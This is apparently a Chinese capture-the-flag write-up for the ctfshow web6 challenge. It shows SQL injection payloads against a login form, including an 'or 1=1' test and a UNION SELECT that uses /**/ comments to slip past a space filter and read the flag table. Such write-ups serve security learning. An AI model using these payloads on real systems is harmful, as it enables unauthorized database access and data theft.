ctfshow-web6

0x00 前言

0x01 题目

0x02 Write Up

看到是一个登录框,所以先考虑到是sql注入。

使用通用payload进行测试

csharp 复制代码
username=a' or 1=1#&password=a

发现这里出现了 sql inject error

然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题

那么我们可以选择使用/**/代替空格

然后就是正常流程

csharp 复制代码
username=a'/**/union/**/select/**/1,flag,3/**/from/**/web2.flag#&password=a

以上

相关推荐
ShoreKiten9 小时前
ctfshowweb361--一道题从0入门SSTI模板注入
web安全·flask·ssti·ctfshow
独行soc17 小时前
2026年渗透测试面试题总结-25(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
AC赳赳老秦19 小时前
2026 智能制造趋势:DeepSeek 助力“黑灯”工厂运营,实现生产流程自动化
网络·数据结构·算法·安全·web安全·prometheus·deepseek
一名优秀的码农20 小时前
vulhub系列-03-Billu_b0x(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
独行soc20 小时前
2026年渗透测试面试题总结-26(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
临水逸1 天前
飞牛fnos 2025 漏洞Java跨域URL浏览器
java·开发语言·安全·web安全
独行soc1 天前
2026年渗透测试面试题总结-24(题目+回答)
网络·python·安全·web安全·渗透测试·安全狮
正义的彬彬侠1 天前
Hashcat 使用手册:从入门到高级密码恢复指南
安全·web安全·网络安全·渗透测试·hashcat
一名优秀的码农2 天前
vulhub系列-02-Raven2(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
AC赳赳老秦2 天前
轻量化模型浪潮下的关键技术突破:DeepSeek INT4量化优化引领2026端侧算力新纪元
网络·安全·mongodb·web安全·flink·prometheus·deepseek